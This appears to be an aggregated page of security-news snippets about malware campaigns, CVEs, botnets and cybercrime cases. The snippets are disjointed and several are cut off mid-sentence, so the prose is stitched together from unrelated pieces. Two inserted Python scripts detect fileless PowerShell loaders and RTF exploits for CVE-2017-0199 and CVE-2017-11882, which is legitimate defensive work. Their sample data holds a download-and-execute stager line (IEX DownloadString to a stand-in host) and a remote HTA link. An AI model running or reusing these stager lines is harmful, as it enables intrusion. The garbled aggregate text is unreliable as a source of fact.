“If you need a server for a botnet, for malware, brute, scan, phishing, fakes and any other tasks, please contact us,” BEARHOST’s ad on one forum advises. A fake browser update page pushing mobile malware (image: Intrinsec). But in September 2017, the Department of Homeland Security (DHS) barred U.S.
Almost daily now there is news about flaws in commercial software that lead to computers getting hacked and seeded with malware. Here’s a look at one long-lived malware vulnerability testing service that is used and run by some of the Dark Web’s top cybercriminals. RedBear’s profile on the Russian-language xss[.]is
Marcus Hutchins, a 24-year-old blogger and malware researcher arrested in 2017 for allegedly authoring and selling malware designed to steal online banking credentials, has pleaded guilty to criminal charges of conspiracy and to making, selling or advertising illegal wiretapping devices.
Fortinet researchers discovered a new phishing campaign spreading a variant of the commercial malware Remcos RAT. Opening the attached file triggers the remote code execution vulnerability CVE-2017-0199, which downloads an HTA file and executes it on the recipient’s device.
The conventional story is that Iran targeted Saudi Arabia with Triton in 2017. New research from FireEye indicates that it might have been Russia. I don't know. FireEye likes to attribute all sorts of things to Russia, but the evidence here looks pretty good.
The Android tool, codenamed EagleMsgSpy by Lookout, has been operational since at least 2017, with artifacts uploaded to the VirusTotal malware scanning platform as recently as
The malware was discovered on counterfeit Android devices mimicking popular smartphone models. “The malware has broad functionality and gives attackers almost unlimited control over the gadget.” The malware, embedded in the system framework, provides attackers full control over the device. 231 banking malware.
In 2017, some Android phones came with a backdoor pre-installed: Criminals in 2017 managed to get an advanced backdoor preinstalled on Android devices before they left the factories of manufacturers, Google researchers confirmed on Thursday. That meant the malware could directly tamper with every installed app.
Interesting story about a barcode scanner app that has been pushing malware on to Android phones. It’s been around since 2017 and is owned by the Ukrainian company Lavabird Ldt. It is baffling to me that an app developer with a popular app would turn it into malware. The app is called Barcode Scanner.
Microsoft today is taking the unusual step of releasing security updates for unsupported but still widely-used Windows operating systems like XP and Windows 2003 , citing the discovery of a “wormable” flaw that the company says could be used to fuel a fast-moving malware threat like the WannaCry ransomware attacks of 2017.
million in a 2018 ATM cash out scheme targeting a Pakistani bank; and a total of $112 million in virtual currencies stolen between 2017 and 2020 from cryptocurrency companies in Slovenia, Indonesia and New York. In reality, prosecutors say, the programs were malware or downloaded malware after the applications were installed.
Ukraine is again under malware attack. And the tactics look strikingly similar to 2017’s NotPetya hack by the Russian GRU. The post ‘Russian’ Wiper Malware: ‘Prelude to war’ in Ukraine appeared first on Security Boulevard.
Dubbed TA2541 by Proofpoint researchers, the group has been attacking targets in several critical industries since 2017 with phishing emails and cloud-hosted malware droppers. The post Researchers discover common threat actor behind aviation and defense malware campaigns appeared first on TechRepublic.
The vulnerability, tracked as CVE-2024-44133 was fixed in the September 16 update for Mac Studio (2022 and later), iMac (2019 and later), Mac Pro (2019 and later), Mac Mini (2018 and later), MacBook Air (2020 and later), MacBook Pro (2018 and later), and iMac Pro (2017 and later).
Sources close to the investigation tell KrebsOnSecurity the malware is known as Defray. Defray was first spotted in 2017, and its purveyors have a history of specifically targeting companies in the healthcare space. R1 RCM declined to discuss the strain of ransomware it is battling or how it was compromised.
The FBI warned of a fresh wave of HiatusRAT malware attacks targeting internet-facing Chinese-branded web cameras and DVRs. The Federal Bureau of Investigation (FBI) released a Private Industry Notification (PIN) to warn of HiatusRAT malware campaigns targeting Chinese-branded web cameras and DVRs.
What’s the best way for a company to test its malware defenses in real-life scenarios? In fact, a 2017 report predicted that by 2020 businesses will be hit by a threat actor every eleven seconds. The post Safely Test Your Malware, Ransomware and Virus Defenses appeared first on Security Boulevard.
A sophisticated malware tracked as StripedFly remained undetected for five years and infected approximately one million devices. Researchers from Kaspersky discovered a sophisticated malware, dubbed StripedFly, that remained under the radar for five years masquerading as a cryptocurrency miner. “What was the real purpose?
ShadowPad, an infamous Windows backdoor that allows attackers to download further malicious modules or steal data, has been put to use by five different Chinese threat clusters since 2017.
In a newly uncovered advanced malware campaign, threat actors are using a complex, fileless approach to deliver the Remcos Remote Access Trojan (RAT), leveraging a benign-looking Excel document as the... The post Fileless Remcos RAT Campaign Leverages CVE-2017-0199 Flaw appeared first on Cybersecurity News.
The DOJ said it did not seek to disinfect compromised devices; instead, it obtained court orders to remove the Cyclops Blink malware from its “command and control” servers, the hidden machines that allowed the attackers to orchestrate the activities of the botnet.
Over one million WordPress websites are estimated to have been infected by an ongoing campaign to deploy malware called Balada Injector since 2017. The massive campaign, per GoDaddy's Sucuri, "leverages all known and recently discovered theme and plugin vulnerabilities" to breach WordPress sites.
A novel malware named CosmicStrand is said to target older motherboards sold by Asus and Gigabyte. The crux is that it lives in the Unified Extensible Firmware Interface (UEFI) firmware rather than on the storage drive, so it survives operating system reinstalls.
APT37 exploited this flaw to trick victims into downloading malware on their desktops with the toast ad program installed. organizations and individuals involved in Korean Peninsula reunification efforts); Researchers from FireEye revealed that the nation-state actor also targeted entities in Japan, Vietnam, and even the Middle East in 2017.
Marcus Hutchins , the “accidental hero” who helped arrest the spread of the global WannaCry ransomware outbreak in 2017, will receive no jail time for his admitted role in authoring and selling malware that helped cyberthieves steal online bank account credentials from victims, a federal judge ruled Friday.
Unidentified threat actors have deployed a new backdoor that borrows its features from the U.S. Central Intelligence Agency (CIA)'s Hive multi-platform malware suite, the source code of which was released by WikiLeaks in November 2017.
We continued to monitor the group throughout the rest of the year, observing intense activity that included updates to SideWinder’s toolset and the creation of a massive new infrastructure to spread malware and control compromised systems. Additionally, they change the names and paths of their malicious files.
WannaCry was a 2017 cyberattack, based on an NSA-discovered and Russia-stolen-and-published Windows vulnerability. Even if we assume that the report is self-serving to the company that wrote it, and that the statistic is not generally representative, this is still a disaster. The number should be 0%.
Threat actors are exploiting an old Microsoft Office vulnerability, tracked as CVE-2017-11882 (CVSS score: 7.8), as part of phishing campaigns to spread the Agent Tesla malware.
Microsoft has issued an official warning to all IT and not-for-profit organizations, along with some critical government organizations across Ukraine, that their digital infrastructure could be targeted by a dreaded data wiping malware campaign.
Recent Guardz research shows that more than 15% of the tools advertised on dark web forums target vulnerabilities like the one behind EternalBlue, the Windows SMBv1 exploit whose flaw Microsoft patched as MS17-010 in 2017 and which still hasn’t been fully remediated across the globe. In some cases, pre-built ransomware kits complete with instructions are sold for just a few hundred dollars.
Unlike traditional malware, which relies on a file being written to a disk, fileless malware is intended to be memory resident only, ideally leaving no trace after its execution. For an attacker, fileless malware has two major advantages: There is no file for traditional anti-virus software to detect. Is fileless malware new?
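The paragraph above explains why fileless malware leaves anti-virus little to scan: the payload never touches disk, so the evidence lives in process command lines and script-block logs instead. The following triage script is an added example (not code from any of the articles listed here) that decodes PowerShell `-EncodedCommand` blobs and flags the in-memory loader idioms typically seen in such attacks. The indicator patterns, the `CommandLine=` log field, and the sample log lines are all constructed for this example.

```python
import base64
import re

# Indicator patterns (assumptions chosen for this example, not a vendor's rule set);
# each is matched case-insensitively against the command line plus any decoded script
FILELESS_PATTERNS = [
    (r"\biex\b|invoke-expression", "in-memory execution (IEX)"),
    (r"downloadstring|downloaddata|invoke-webrequest|\biwr\b", "payload fetched straight into memory"),
    (r"\[(?:system\.)?reflection\.assembly\]::load", "reflective .NET assembly load"),
    (r"frombase64string", "base64-decoded payload"),
    (r"-w(?:indowstyle)?\s+hidden|-nop\b|-noprofile|-ep\s+bypass|-executionpolicy\s+bypass", "evasion flags"),
]
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob holding a UTF-16LE script
ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
CMDLINE_RE = re.compile(r"CommandLine=(.*)$")


def decode_encoded_command(cmdline: str):
    """Return the script hidden behind -EncodedCommand, or None if there is none."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_command_line(cmdline: str) -> dict:
    decoded = decode_encoded_command(cmdline)
    # judge the visible flags plus the decoded script, never the opaque base64 blob itself
    visible = ENC_RE.sub("-EncodedCommand <blob>", cmdline)
    text = (visible + " " + (decoded or "")).lower()
    indicators = [label for pattern, label in FILELESS_PATTERNS if re.search(pattern, text)]
    return {"decoded": decoded, "indicators": indicators, "score": len(indicators)}


def triage_process_log(lines) -> list:
    """Run the analysis over process-creation log lines that carry a CommandLine= field."""
    results = []
    for line in lines:
        m = CMDLINE_RE.search(line)
        if m:
            results.append(analyze_command_line(m.group(1)))
    return results


# --- constructed sample log lines (Sysmon-style process creation events) ---------
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii")
SAMPLE_LOG = [
    "EventID=1 Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "CommandLine=powershell.exe -NoP -W Hidden -Enc " + ENCODED,
    "EventID=1 Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "CommandLine=powershell.exe -ep bypass -c \"[Reflection.Assembly]::Load([Convert]::FromBase64String($b))\"",
    "EventID=1 Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "CommandLine=powershell.exe -File C:\\scripts\\backup.ps1",
]

if __name__ == "__main__":
    for line, result in zip(SAMPLE_LOG, triage_process_log(SAMPLE_LOG)):
        print(result["score"], result["indicators"], "<-", line.split("CommandLine=", 1)[1][:60])
```

The first sample line only looks harmless because its script is base64; decoding it exposes the download-and-IEX stager, which is why the indicators are matched against the decoded text rather than the blob. The `-File backup.ps1` line scores zero, the kind of legitimate administrative use a rule like this must not page on.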
Merck suffered US$1.4 billion in business interruption losses from the NotPetya cyber attack of 2017, which were claimed against “all risks” property re/insurance policies providing coverage for losses resulting from destruction or corruption of computer data and software.
Almost a dozen state-sponsored threat groups from Russia, China, and North Korea have been exploiting a security flaw in Windows in attacks on governments and critical infrastructure that date back to 2017. According to Trend Micro's Zero Day Initiative (ZDI), Microsoft has no plans to patch the vulnerability.
RTF exploit: RTF files were specifically crafted by the attacker to exploit CVE-2017-11882, a memory corruption vulnerability in the Equation Editor component of Microsoft Office. The malware uses different strings to load libraries and functions required for execution. In particular, Avast and AVG solutions are of interest to the malware.
Researchers uncovered an ongoing campaign abusing popular messaging platforms Skype and Teams to distribute the DarkGate malware. The threat actors abused popular messaging platforms such as Skype and Teams to deliver a script used as a loader for a second-stage payload, which was an AutoIT script containing the DarkGate malware.
Proofpoint researchers observed a threat actor, tracked as TA547, targeting German organizations with an email campaign delivering the Rhadamanthys malware. The security firm pointed out that this is the first time TA547 has used this malware family. The experts also found signs that an LLM was used in preparing the malware campaign.
Researchers from NTT Security reported that the China-linked BlackTech cyberespionage group targeted Japanese companies using new malware tracked as ‘Flagpro’. “It means that they are actively developing new malware.
Recently, the Malwarebytes Threat Intelligence Team found a Formbook campaign targeting oil and gas companies. The Formbook malware is an information stealer that is in use by many threat actors. The embedded object downloaded a remote template that exploits CVE-2017-11882 to download and execute the FormBook malware.
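Several items above (the Remcos campaigns built on CVE-2017-0199, and the Agent Tesla and Formbook campaigns built on CVE-2017-11882) share one delivery mechanism: an RTF or Office attachment carrying an embedded OLE object. The script below is an added example, not code from any of those reports, showing how a triage tool can pull the `\objdata` objects out of an RTF file and check them for the two patterns those articles describe: an `OLE2Link` object (CVE-2017-0199, usually paired with `\objupdate` so the remote HTA or template is fetched as soon as the document opens) and a Microsoft Equation 3.0 object (CVE-2017-11882). The indicator strings, the Equation 3.0 CLSID, and the three sample documents are assumptions constructed for this example; the samples contain no real exploit bytes.

```python
import binascii
import re

# Indicators used by this triage script (assumptions for this example, not taken from the
# reports above):
#  - CVE-2017-0199 documents embed an "OLE2Link" object whose URL moniker points at the
#    remote HTA/template; \objupdate or \objautlink makes Word refresh it on open.
#  - CVE-2017-11882 documents embed a Microsoft Equation 3.0 object, identified either by
#    its ProgID "Equation.3" or by its CLSID {0002CE02-0000-0000-C000-000000000046},
#    which is stored little-endian inside the OLE stream.
OLE2LINK_MARKER = b"OLE2Link"
EQUATION3_PROGID = b"Equation.3"
EQUATION3_CLSID_LE = bytes.fromhex("02ce020000000000c000000000000046")

# \*\objdata is followed by the OLE object as a run of hex digits, often wrapped over many lines
OBJDATA_RE = re.compile(rb"\\\*\\objdata\s*([0-9a-fA-F\s]+)")
# URLs inside OLE streams are commonly UTF-16LE: "http://" or "https://" plus printable chars
UTF16_URL_RE = re.compile(rb"h\x00t\x00t\x00p\x00(?:s\x00)?:\x00/\x00/\x00(?:[!-~]\x00)+")


def extract_objdata(rtf: bytes) -> list:
    """Return every embedded OLE object in the RTF, hex-decoded."""
    blobs = []
    for m in OBJDATA_RE.finditer(rtf):
        hexdigits = re.sub(rb"\s", b"", m.group(1))
        if len(hexdigits) % 2:          # tolerate a truncated trailing nibble
            hexdigits = hexdigits[:-1]
        try:
            blobs.append(binascii.unhexlify(hexdigits))
        except binascii.Error:
            continue
    return blobs


def find_utf16_urls(blob: bytes) -> list:
    return [m.group(0).decode("utf-16-le") for m in UTF16_URL_RE.finditer(blob)]


def triage_rtf(rtf: bytes) -> dict:
    """Flag the two Office exploit patterns discussed above and pull out any embedded URL."""
    blobs = extract_objdata(rtf)
    lowered = rtf.lower()
    # these control words make Word load the linked object without any user interaction
    auto_load = b"\\objupdate" in lowered or b"\\objautlink" in lowered
    findings, urls = [], []
    for i, blob in enumerate(blobs):
        if OLE2LINK_MARKER in blob:
            findings.append(f"objdata[{i}]: OLE2Link object (CVE-2017-0199 pattern)")
        if EQUATION3_PROGID in blob or EQUATION3_CLSID_LE in blob:
            findings.append(f"objdata[{i}]: Equation.3 object (CVE-2017-11882 pattern)")
        urls.extend(find_utf16_urls(blob))
    return {"objects": len(blobs), "auto_load": auto_load,
            "findings": findings, "urls": urls, "suspect": bool(findings)}


# --- constructed, benign test documents (no real exploit bytes) ---------------------
def _ole1_header(class_name: bytes) -> bytes:
    # OLE 1.0 ObjectHeader: version 1.5, FormatID 2 (embedded), length-prefixed class name
    name = class_name + b"\x00"
    return b"\x01\x05\x00\x00" + b"\x02\x00\x00\x00" + len(name).to_bytes(4, "little") + name


def _rtf_with_object(ole_bytes: bytes, controls: bytes = b"") -> bytes:
    hexdigits = binascii.hexlify(ole_bytes)
    wrapped = b"\r\n".join(hexdigits[i:i + 64] for i in range(0, len(hexdigits), 64))
    return b"{\\rtf1\\ansi{\\object" + controls + b"{\\*\\objdata " + wrapped + b"}}}"


SAMPLE_0199 = _rtf_with_object(
    _ole1_header(OLE2LINK_MARKER) + b"\xd0\xcf\x11\xe0"      # compound-file magic
    + "http://example.invalid/payload.hta".encode("utf-16-le") + b"\x00\x00",
    controls=b"\\objautlink\\objupdate")
SAMPLE_11882 = _rtf_with_object(_ole1_header(EQUATION3_PROGID) + EQUATION3_CLSID_LE + b"\x00" * 8)
SAMPLE_BENIGN = b"{\\rtf1\\ansi Quarterly report, nothing embedded.}"

if __name__ == "__main__":
    for name, doc in (("0199", SAMPLE_0199), ("11882", SAMPLE_11882), ("benign", SAMPLE_BENIGN)):
        print(name, triage_rtf(doc))
```

The URL extracted from the OLE2Link object is the most useful artefact for an analyst, since it is the stage-two host the HTA or template is fetched from. Real samples pad and obfuscate the hex run (spaces, line breaks, odd-length tails), which is why the decoder strips whitespace and tolerates a dangling nibble instead of rejecting the object.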
The Computer Emergency Response Team in Ukraine (CERT-UA) reported that a PurpleFox malware campaign had already infected at least 2,000 computers in the country. Experts describe DirtyMoe as a complex malware that has been designed as a modular system.
Researchers from Kaspersky’s Global Emergency Response Team (GERT) and GReAT uncovered a new Go-based multi-platform malware, tracked as NKAbuse, which is the first malware abusing NKN technology.
The North Korean cyberespionage group known as Kimsuky has been observed using three different Android malware families targeted specifically at South Korean users. Kimsuky, also known as Velvet Chollima, Thallium, or Black Banshee, is a North Korea-based threat group with operations going back to 2017.
In 2012 KrebsOnSecurity wrote about the plight of Yuriy “Jtk” Konovalenko , a then 30-year-old Ukrainian man who was rounded up as part of an international crackdown on an organized crime gang that used the ZeuS malware to steal tens of millions of dollars from companies and consumers. Attorney Adam Alexander.
Researchers found over 100 servers distributing Mirai malware and communicating with compromised IPs, indicating the campaign is ongoing. “Mirai malware, here dubbed Murdoc Botnet, is a prominent malware family for *nix systems. It mainly targets vulnerable AVTECH and Huawei devices,” reads the advisory.